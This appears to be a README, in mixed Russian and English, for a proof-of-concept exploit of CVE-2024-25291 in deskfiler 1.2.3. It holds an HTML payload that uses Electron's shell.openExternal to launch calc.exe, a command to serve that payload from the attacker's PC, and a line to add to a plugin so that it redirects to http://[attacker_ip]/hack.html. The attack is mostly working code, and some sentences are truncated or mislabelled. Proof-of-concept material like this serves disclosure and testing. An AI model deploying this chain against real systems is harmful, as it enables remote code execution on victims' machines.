
Эксплойт открытого перенаправления deskfiler 1.2.3
A Proof-Of-Concept for CVE-2024-25291 vulnerability.
deskfiler - 1.2.3 allows Electron webview in application, with resultant remote code
In this repository there is an example vulnerable application and proof-of-concept (POC) exploit of it.
<html>
<head>
<title>jruru</title>
</head>
<body>
<script>
const { shell } = require('electron');
shell.openExternal('file:C:/Windows/System32/calc.exe');
</script>
</body>
</html>
※ Если вы хотите быстро проверить это, создайте сервер на ПК атакующего с помощью следующего кода.
$ python -m http.server 80
Примечание: ※ В данном случае предполагается, что плагин создан атакующим и представляет собой обычный плагин с добавленным кодом, который позволяет обратиться к серверу атакующего. Для простого тестирования был выбран BareBone

Затем добавьте следующий код в файл index.js в пути к папке BareBone.
window.location='http://[attacker_ip]/hack.html'


В этом PoC мы использовали плагин; однако мы полагаем, что при использовании альтернативных векторов атаки возможно достижение удалённого выполнения кода (RCE) независимо. Кроме того, при наличии серверных уязвимостей, таких как Stored XSS, Reflected XSS, RCE также считается осуществимой.